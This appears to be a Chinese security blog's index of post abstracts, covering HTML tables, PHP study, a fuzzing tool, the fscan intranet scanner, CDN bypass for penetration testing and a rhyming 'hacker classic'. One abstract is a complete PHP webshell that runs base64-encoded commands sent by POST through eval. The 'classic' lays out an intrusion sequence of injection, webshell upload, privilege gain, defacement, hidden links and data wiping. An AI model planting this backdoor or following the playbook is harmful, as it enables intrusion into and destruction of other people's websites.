摘要:
<table>代表表格</table><tr>代表表格中的一行</tr><td>代表表格中的一列</td>'tr'与'td'交成一个单元格<table>...</table>之间有多少个<tr>,就有多少行<tr>...</tr>之间有多少个<td>,就有多少列 阅读全文
摘要:
2022年,从头开始学习PHP 加油!!! 阅读全文
摘要:
国外网站看到的。 简贴一下谷歌翻译的介绍 是什么让这个工具与其他工具不同: 它被写入异步工作,允许达到最大限制。所以它非常快。 校准模式,自行应用过滤器 有一堆标志可以帮助你详细地模糊 给定状态代码和深度的递归扫描模式 报告世代,你可以稍后去检查你的结果 多个 url 扫描 安装 git clone 阅读全文
摘要:
一:老黑客三字经 进谷歌 找注入没注入 就旁注没旁注 用Oday没Oday 猜目录没目录 就嗅探爆账户 找后台传小马 放大马拿权限 挂页面放暗链 清数据 二:新黑客三字经 搞企业 先扫描扫描器 商业好默密码 都知道社工库 找一找邮箱号 先列好九头蛇 跑一跑搞不定 放大招发邮件 凭伪造没邮箱 搞网站二 阅读全文
摘要:
python -m SimpleHTTPServer 8888 使用上面的命令可以把当前目录发布到8888端口。 直接浏览器访问 但是这条命令是当前运行的,不是后台运行的,也就是说如果Ctrl + C,则该端口就会关闭。 python -m SimpleHTTPServer 8888 & 在上述命令 阅读全文
摘要:
fscan简介 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能 主要功能 1.信息搜集: 存活探测( 阅读全文
摘要:
<?php if(isset($_REQUEST['phpsessid'])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST['key'],3)); eval(B::$d); } ?> 阅读全文
摘要:
这是一篇全网(无论国内还是国外)最全、最详细、最新、最实用的关于 CDN 网络对抗攻击的文章,渗透测试中若碰到 CDN 类的问题,只需要看这一篇指南即可。我也会在 Github (https://github.com/bin-maker/2021CDN/)长期保持此文的更新,更新与修正新的对抗技术、 阅读全文